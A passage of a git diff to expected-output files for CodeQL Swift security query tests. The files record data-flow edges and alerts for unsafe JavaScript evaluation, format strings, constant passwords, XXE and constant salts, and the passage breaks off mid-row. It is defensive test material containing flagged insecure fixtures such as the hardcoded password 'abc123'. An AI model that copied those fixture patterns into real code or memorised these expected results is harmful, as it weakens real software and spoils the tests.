WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | UnsafeJsEval.swift:208:30:208:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | Evaluation of uncontrolled JavaScript from a remote source. | +| UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:277:26:277:26 | string | UnsafeJsEval.swift:204:12:204:66 | call to String.init(contentsOf:) | UnsafeJsEval.swift:277:26:277:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:277:26:277:26 | string | UnsafeJsEval.swift:205:12:205:35 | call to String.init(contentsOf:) | UnsafeJsEval.swift:277:26:277:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:277:26:277:26 | string | UnsafeJsEval.swift:208:30:208:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:277:26:277:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:277:26:277:26 | string | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:277:26:277:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | +| UnsafeJsEval.swift:277:26:277:26 | string | UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:277:26:277:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:280:26:280:26 | string | UnsafeJsEval.swift:204:12:204:66 | call to String.init(contentsOf:) | UnsafeJsEval.swift:280:26:280:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:280:26:280:26 | string | UnsafeJsEval.swift:205:12:205:35 | call to String.init(contentsOf:) | UnsafeJsEval.swift:280:26:280:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:280:26:280:26 | string | UnsafeJsEval.swift:208:30:208:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:280:26:280:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:280:26:280:26 | string | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:280:26:280:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | +| UnsafeJsEval.swift:280:26:280:26 | string | UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:280:26:280:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:291:17:291:17 | jsstr | UnsafeJsEval.swift:204:12:204:66 | call to String.init(contentsOf:) | UnsafeJsEval.swift:291:17:291:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:291:17:291:17 | jsstr | UnsafeJsEval.swift:205:12:205:35 | call to String.init(contentsOf:) | UnsafeJsEval.swift:291:17:291:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:291:17:291:17 | jsstr | UnsafeJsEval.swift:208:30:208:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:291:17:291:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:291:17:291:17 | jsstr | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:291:17:291:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | +| UnsafeJsEval.swift:291:17:291:17 | jsstr | UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:291:17:291:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:305:17:305:17 | jsstr | UnsafeJsEval.swift:204:12:204:66 | call to String.init(contentsOf:) | UnsafeJsEval.swift:305:17:305:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:305:17:305:17 | jsstr | UnsafeJsEval.swift:205:12:205:35 | call to String.init(contentsOf:) | UnsafeJsEval.swift:305:17:305:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:305:17:305:17 | jsstr | UnsafeJsEval.swift:208:30:208:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:305:17:305:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:305:17:305:17 | jsstr | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:305:17:305:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | +| UnsafeJsEval.swift:305:17:305:17 | jsstr | UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:305:17:305:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:320:44:320:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:318:24:318:87 | call to String.init(contentsOf:) | UnsafeJsEval.swift:320:44:320:74 | ... .+(_:_:) ... | Evaluation of uncontrolled JavaScript from a remote source. | diff --git a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected index 94dd27a82c2..43a8b08c7ea 100644 --- a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected +++ b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected @@ -18,6 +18,8 @@ edges | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:116:11:116:11 | tainted | provenance | | | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:116:11:116:11 | tainted | provenance | | | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:118:61:118:61 | tainted | provenance | | +| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:120:26:120:26 | tainted | provenance | | +| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:124:27:124:27 | tainted | provenance | | | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:130:39:130:39 | tainted | provenance | | | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:135:37:135:37 | tainted | provenance | | | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:139:5:139:5 | tainted | provenance | | @@ -28,6 +30,14 @@ edges | UncontrolledFormatString.swift:111:50:111:50 | tainted | UncontrolledFormatString.swift:111:33:111:57 | call to NSString.init(string:) | provenance | | | UncontrolledFormatString.swift:112:64:112:64 | tainted | UncontrolledFormatString.swift:112:47:112:71 | call to NSString.init(string:) | provenance | | | UncontrolledFormatString.swift:116:11:116:11 | tainted | UncontrolledFormatString.swift:77:12:77:22 | format | provenance | | +| UncontrolledFormatString.swift:120:22:120:33 | call to Self.init(_:) | UncontrolledFormatString.swift:122:24:122:24 | taintedSan | provenance | | +| UncontrolledFormatString.swift:120:26:120:26 | tainted | UncontrolledFormatString.swift:120:22:120:33 | call to Self.init(_:) | provenance | | +| UncontrolledFormatString.swift:124:23:124:34 | call to Self.init(_:) | UncontrolledFormatString.swift:125:30:125:30 | taintedVal2 | provenance | | +| UncontrolledFormatString.swift:124:27:124:27 | tainted | UncontrolledFormatString.swift:124:23:124:34 | call to Self.init(_:) | provenance | | +| UncontrolledFormatString.swift:125:23:125:41 | call to String.init(_:) | UncontrolledFormatString.swift:126:24:126:24 | taintedSan2 | provenance | | +| UncontrolledFormatString.swift:125:23:125:41 | call to String.init(_:) [Collection element] | UncontrolledFormatString.swift:126:24:126:24 | taintedSan2 | provenance | | +| UncontrolledFormatString.swift:125:30:125:30 | taintedVal2 | UncontrolledFormatString.swift:125:23:125:41 | call to String.init(_:) | provenance | | +| UncontrolledFormatString.swift:125:30:125:30 | taintedVal2 | UncontrolledFormatString.swift:125:23:125:41 | call to String.init(_:) [Collection element] | provenance | | | UncontrolledFormatString.swift:135:37:135:37 | tainted | UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | provenance | | | UncontrolledFormatString.swift:139:5:139:5 | tainted | UncontrolledFormatString.swift:140:9:140:9 | cstr [Collection element] | provenance | | | UncontrolledFormatString.swift:140:9:140:9 | cstr [Collection element] | UncontrolledFormatString.swift:141:24:141:24 | cstr | provenance | | @@ -60,6 +70,15 @@ nodes | UncontrolledFormatString.swift:116:11:116:11 | tainted | semmle.label | tainted | | UncontrolledFormatString.swift:116:11:116:11 | tainted | semmle.label | tainted | | UncontrolledFormatString.swift:118:61:118:61 | tainted | semmle.label | tainted | +| UncontrolledFormatString.swift:120:22:120:33 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| UncontrolledFormatString.swift:120:26:120:26 | tainted | semmle.label | tainted | +| UncontrolledFormatString.swift:122:24:122:24 | taintedSan | semmle.label | taintedSan | +| UncontrolledFormatString.swift:124:23:124:34 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| UncontrolledFormatString.swift:124:27:124:27 | tainted | semmle.label | tainted | +| UncontrolledFormatString.swift:125:23:125:41 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| UncontrolledFormatString.swift:125:23:125:41 | call to String.init(_:) [Collection element] | semmle.label | call to String.init(_:) [Collection element] | +| UncontrolledFormatString.swift:125:30:125:30 | taintedVal2 | semmle.label | taintedVal2 | +| UncontrolledFormatString.swift:126:24:126:24 | taintedSan2 | semmle.label | taintedSan2 | | UncontrolledFormatString.swift:130:39:130:39 | tainted | semmle.label | tainted | | UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | semmle.label | call to NSString.init(string:) | | UncontrolledFormatString.swift:135:37:135:37 | tainted | semmle.label | tainted | @@ -88,6 +107,8 @@ subpaths | UncontrolledFormatString.swift:115:11:115:11 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:115:11:115:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | | UncontrolledFormatString.swift:116:11:116:11 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:116:11:116:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | | UncontrolledFormatString.swift:118:61:118:61 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:118:61:118:61 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:122:24:122:24 | taintedSan | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:122:24:122:24 | taintedSan | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:126:24:126:24 | taintedSan2 | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:126:24:126:24 | taintedSan2 | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | | UncontrolledFormatString.swift:130:39:130:39 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:130:39:130:39 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | | UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | | UncontrolledFormatString.swift:141:24:141:24 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:141:24:141:24 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | diff --git a/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected b/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected index 0c1e98bfe7c..640286de0ca 100644 --- a/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected +++ b/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected @@ -1,4 +1,17 @@ edges +| rncryptor.swift:60:9:60:65 | call to String.init(_:) | rncryptor.swift:68:25:68:44 | call to getARandomPassword() | provenance | | +| rncryptor.swift:60:9:60:65 | call to String.init(_:) [Collection element] | rncryptor.swift:68:25:68:44 | call to getARandomPassword() [Collection element] | provenance | | +| rncryptor.swift:60:16:60:16 | ............ | rncryptor.swift:60:16:60:64 | call to map(_:) | provenance | | +| rncryptor.swift:60:16:60:64 | call to map(_:) | rncryptor.swift:60:9:60:65 | call to String.init(_:) | provenance | | +| rncryptor.swift:60:16:60:64 | call to map(_:) | rncryptor.swift:60:9:60:65 | call to String.init(_:) [Collection element] | provenance | | +| rncryptor.swift:68:25:68:44 | call to getARandomPassword() | rncryptor.swift:74:89:74:89 | myRandomPassword | provenance | | +| rncryptor.swift:68:25:68:44 | call to getARandomPassword() | rncryptor.swift:75:56:75:56 | myRandomPassword | provenance | | +| rncryptor.swift:68:25:68:44 | call to getARandomPassword() | rncryptor.swift:80:89:80:89 | myMaybePassword | provenance | | +| rncryptor.swift:68:25:68:44 | call to getARandomPassword() | rncryptor.swift:81:56:81:56 | myMaybePassword | provenance | | +| rncryptor.swift:68:25:68:44 | call to getARandomPassword() [Collection element] | rncryptor.swift:74:89:74:89 | myRandomPassword | provenance | | +| rncryptor.swift:68:25:68:44 | call to getARandomPassword() [Collection element] | rncryptor.swift:75:56:75:56 | myRandomPassword | provenance | | +| rncryptor.swift:68:25:68:44 | call to getARandomPassword() [Collection element] | rncryptor.swift:80:89:80:89 | myMaybePassword | provenance | | +| rncryptor.swift:68:25:68:44 | call to getARandomPassword() [Collection element] | rncryptor.swift:81:56:81:56 | myMaybePassword | provenance | | | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:77:89:77:89 | myConstPassword | provenance | | | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:78:56:78:56 | myConstPassword | provenance | | | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:80:89:80:89 | myMaybePassword | provenance | | @@ -30,7 +43,15 @@ edges | test.swift:44:31:44:48 | call to getConstantArray() [Collection element] | test.swift:63:40:63:40 | constantStringPassword | provenance | | | test.swift:44:31:44:48 | call to getConstantArray() [Collection element] | test.swift:68:34:68:34 | constantStringPassword | provenance | | nodes +| rncryptor.swift:60:9:60:65 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| rncryptor.swift:60:9:60:65 | call to String.init(_:) [Collection element] | semmle.label | call to String.init(_:) [Collection element] | +| rncryptor.swift:60:16:60:16 | ............ | semmle.label | ............ | +| rncryptor.swift:60:16:60:64 | call to map(_:) | semmle.label | call to map(_:) | +| rncryptor.swift:68:25:68:44 | call to getARandomPassword() | semmle.label | call to getARandomPassword() | +| rncryptor.swift:68:25:68:44 | call to getARandomPassword() [Collection element] | semmle.label | call to getARandomPassword() [Collection element] | | rncryptor.swift:69:24:69:24 | abc123 | semmle.label | abc123 | +| rncryptor.swift:74:89:74:89 | myRandomPassword | semmle.label | myRandomPassword | +| rncryptor.swift:75:56:75:56 | myRandomPassword | semmle.label | myRandomPassword | | rncryptor.swift:77:89:77:89 | myConstPassword | semmle.label | myConstPassword | | rncryptor.swift:78:56:78:56 | myConstPassword | semmle.label | myConstPassword | | rncryptor.swift:80:89:80:89 | myMaybePassword | semmle.label | myMaybePassword | @@ -65,9 +86,13 @@ nodes | test.swift:68:34:68:34 | constantStringPassword | semmle.label | constantStringPassword | subpaths #select +| rncryptor.swift:74:89:74:89 | myRandomPassword | rncryptor.swift:60:16:60:16 | ............ | rncryptor.swift:74:89:74:89 | myRandomPassword | The value '............' is used as a constant password. | +| rncryptor.swift:75:56:75:56 | myRandomPassword | rncryptor.swift:60:16:60:16 | ............ | rncryptor.swift:75:56:75:56 | myRandomPassword | The value '............' is used as a constant password. | | rncryptor.swift:77:89:77:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:77:89:77:89 | myConstPassword | The value 'abc123' is used as a constant password. | | rncryptor.swift:78:56:78:56 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:78:56:78:56 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:80:89:80:89 | myMaybePassword | rncryptor.swift:60:16:60:16 | ............ | rncryptor.swift:80:89:80:89 | myMaybePassword | The value '............' is used as a constant password. | | rncryptor.swift:80:89:80:89 | myMaybePassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:80:89:80:89 | myMaybePassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:81:56:81:56 | myMaybePassword | rncryptor.swift:60:16:60:16 | ............ | rncryptor.swift:81:56:81:56 | myMaybePassword | The value '............' is used as a constant password. | | rncryptor.swift:81:56:81:56 | myMaybePassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:81:56:81:56 | myMaybePassword | The value 'abc123' is used as a constant password. | | rncryptor.swift:91:39:91:39 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:91:39:91:39 | myConstPassword | The value 'abc123' is used as a constant password. | | rncryptor.swift:92:37:92:37 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:92:37:92:37 | myConstPassword | The value 'abc123' is used as a constant password. | diff --git a/swift/ql/test/query-tests/Security/CWE-611/XXETest.expected b/swift/ql/test/query-tests/Security/CWE-611/XXETest.expected index 213ece4f9ad..8ec8033d086 100644 --- a/swift/ql/test/query-tests/Security/CWE-611/XXETest.expected +++ b/swift/ql/test/query-tests/Security/CWE-611/XXETest.expected @@ -1,18 +1,2 @@ testFailures -| testLibxmlXXE.swift:101:78:102:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | -| testLibxmlXXE.swift:102:80:103:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | -| testLibxmlXXE.swift:103:107:104:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | -| testLibxmlXXE.swift:104:82:105:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | -| testLibxmlXXE.swift:106:78:107:1 | // $ hasXXE=95\n | Missing result: hasXXE=95 | -| testLibxmlXXE.swift:107:80:108:1 | // $ hasXXE=95\n | Missing result: hasXXE=95 | -| testLibxmlXXE.swift:109:87:110:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | -| testLibxmlXXE.swift:110:89:111:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | -| testLibxmlXXE.swift:112:99:113:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | -| testLibxmlXXE.swift:113:97:114:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | -| testLibxmlXXE.swift:115:87:116:1 | // $ hasXXE=95\n | Missing result: hasXXE=95 | -| testLibxmlXXE.swift:116:89:117:1 | // $ hasXXE=95\n | Missing result: hasXXE=95 | -| testLibxmlXXE.swift:118:89:119:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | -| testLibxmlXXE.swift:119:91:120:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | -| testLibxmlXXE.swift:121:98:122:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | -| testLibxmlXXE.swift:122:100:123:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | failures diff --git a/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected b/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected index 002454a3021..93d06372be4 100644 --- a/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected +++ b/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected @@ -1,4 +1,28 @@ edges +| rncryptor.swift:47:9:47:69 | call to String.init(_:) | rncryptor.swift:57:27:57:44 | call to getARandomString() | provenance | | +| rncryptor.swift:47:9:47:69 | call to String.init(_:) | rncryptor.swift:58:27:58:44 | call to getARandomString() | provenance | | +| rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:47:16:47:68 | call to map(_:) | provenance | | +| rncryptor.swift:47:16:47:68 | call to map(_:) | rncryptor.swift:47:9:47:69 | call to String.init(_:) | provenance | | +| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:62:57:62:57 | myRandomSalt1 | provenance | | +| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:67:106:67:106 | myRandomSalt1 | provenance | | +| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:69:106:69:106 | myRandomSalt1 | provenance | | +| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:70:106:70:106 | myRandomSalt1 | provenance | | +| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:72:106:72:106 | myRandomSalt1 | provenance | | +| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:74:127:74:127 | myRandomSalt1 | provenance | | +| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:76:127:76:127 | myRandomSalt1 | provenance | | +| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:77:135:77:135 | myRandomSalt1 | provenance | | +| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:79:135:79:135 | myRandomSalt1 | provenance | | +| rncryptor.swift:57:27:57:44 | call to getARandomString() | rncryptor.swift:57:22:57:45 | call to Data.init(_:) | provenance | | +| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:64:55:64:55 | myRandomSalt2 | provenance | | +| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:67:131:67:131 | myRandomSalt2 | provenance | | +| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:68:133:68:133 | myRandomSalt2 | provenance | | +| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:70:131:70:131 | myRandomSalt2 | provenance | | +| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:71:133:71:133 | myRandomSalt2 | provenance | | +| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:74:152:74:152 | myRandomSalt2 | provenance | | +| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:75:154:75:154 | myRandomSalt2 | provenance | | +| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:77:160:77:160 | myRandomSalt2 | provenance | | +| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:78:162:78:162 | myRandomSalt2 | provenance | | +| rncryptor.swift:58:27:58:44 | call to getARandomString() | rncryptor.swift:58:22:58:45 | call to Data.init(_:) | provenance | | | rncryptor.swift:59:24:59:43 | call to Data.init(_:) | rncryptor.swift:63:57:63:57 | myConstantSalt1 | provenance | | | rncryptor.swift:59:24:59:43 | call to Data.init(_:) | rncryptor.swift:68:106:68:106 | myConstantSalt1 | provenance | | | rncryptor.swift:59:24:59:43 | call to Data.init(_:) | rncryptor.swift:71:106:71:106 | myConstantSalt1 | provenance | | @@ -24,19 +48,44 @@ edges | test.swift:44:27:44:44 | call to getConstantArray() [Collection element] | test.swift:63:59:63:59 | constantStringSalt | provenance | | | test.swift:44:27:44:44 | call to getConstantArray() [Collection element] | test.swift:68:53:68:53 | constantStringSalt | provenance | | nodes +| rncryptor.swift:47:9:47:69 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| rncryptor.swift:47:16:47:16 | ................ | semmle.label | ................ | +| rncryptor.swift:47:16:47:68 | call to map(_:) | semmle.label | call to map(_:) | +| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | semmle.label | call to Data.init(_:) | +| rncryptor.swift:57:27:57:44 | call to getARandomString() | semmle.label | call to getARandomString() | +| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | semmle.label | call to Data.init(_:) | +| rncryptor.swift:58:27:58:44 | call to getARandomString() | semmle.label | call to getARandomString() | | rncryptor.swift:59:24:59:43 | call to Data.init(_:) | semmle.label | call to Data.init(_:) | | rncryptor.swift:59:29:59:29 | abcdef123456 | semmle.label | abcdef123456 | | rncryptor.swift:60:24:60:30 | call to Data.init(_:) | semmle.label | call to Data.init(_:) | | rncryptor.swift:60:29:60:29 | 0 | semmle.label | 0 | +| rncryptor.swift:62:57:62:57 | myRandomSalt1 | semmle.label | myRandomSalt1 | | rncryptor.swift:63:57:63:57 | myConstantSalt1 | semmle.label | myConstantSalt1 | +| rncryptor.swift:64:55:64:55 | myRandomSalt2 | semmle.label | myRandomSalt2 | | rncryptor.swift:65:55:65:55 | myConstantSalt2 | semmle.label | myConstantSalt2 | +| rncryptor.swift:67:106:67:106 | myRandomSalt1 | semmle.label | myRandomSalt1 | +| rncryptor.swift:67:131:67:131 | myRandomSalt2 | semmle.label | myRandomSalt2 | | rncryptor.swift:68:106:68:106 | myConstantSalt1 | semmle.label | myConstantSalt1 | +| rncryptor.swift:68:133:68:133 | myRandomSalt2 | semmle.label | myRandomSalt2 | +| rncryptor.swift:69:106:69:106 | myRandomSalt1 | semmle.label | myRandomSalt1 | | rncryptor.swift:69:131:69:131 | myConstantSalt2 | semmle.label | myConstantSalt2 | +| rncryptor.swift:70:106:70:106 | myRandomSalt1 | semmle.label | myRandomSalt1 | +| rncryptor.swift:70:131:70:131 | myRandomSalt2 | semmle.label | myRandomSalt2 | | rncryptor.swift:71:106:71:106 | myConstantSalt1 | semmle.label | myConstantSalt1 | +| rncryptor.swift:71:133:71:133 | myRandomSalt2 | semmle.label | myRandomSalt2 | +| rncryptor.swift:72:106:72:106 | myRandomSalt1 | semmle.label | myRandomSalt1 | | rncryptor.swift:72:131:72:131 | myConstantSalt2 | semmle.label | myConstantSalt2 | +| rncryptor.swift:74:127:74:127 | myRandomSalt1 | semmle.label | myRandomSalt1 | +| rncryptor.swift:74:152:74:152 | myRandomSalt2 | semmle.label | myRandomSalt2 | | rncryptor.swift:75:127:75:127 | myConstantSalt1 | semmle.label | myConstantSalt1 | +| rncryptor.swift:75:154:75:154 | myRandomSalt2 | semmle.label | myRandomSalt2 | +| rncryptor.swift:76:127:76:127 | myRandomSalt1 | semmle.label | myRandomSalt1 | | rncryptor.swift:76:152:76:152 | myConstantSalt2 | semmle.label | myConstantSalt2 | +| rncryptor.swift:77:135:77:135 | myRandomSalt1 | semmle.label | myRandomSalt1 | +| rncryptor.swift:77:160:77:160 | myRandomSalt2 | semmle.label | myRandomSalt2 | | rncryptor.swift:78:135:78:135 | myConstantSalt1 | semmle.label | myConstantSalt1 | +| rncryptor.swift:78:162:78:162 | myRandomSalt2 | semmle.label | myRandomSalt2 | +| rncryptor.swift:79:135:79:135 | myRandomSalt1 | semmle.label | myRandomSalt1 | | rncryptor.swift:79:160:79:160 | myConstantSalt2 | semmle.label | myConstantSalt2 | | test.swift:29:3:29:3 | this string is constant | semmle.label | this string is constant | | test.swift:33:2:33:34 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | @@ -54,15 +103,33 @@ nodes | test.swift:68:53:68:53 | constantStringSalt | semmle.label | constantStringSalt | subpaths #select +| rncryptor.swift:62:57:62:57 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:62:57:62:57 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:63:57:63:57 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:63:57:63:57 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:64:55:64:55 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:64:55:64:55 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:65:55:65:55 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:65:55:65:55 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| rncryptor.swift:67:106:67:106 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:67:106:67:106 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | +| rncryptor.swift:67:131:67:131 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | 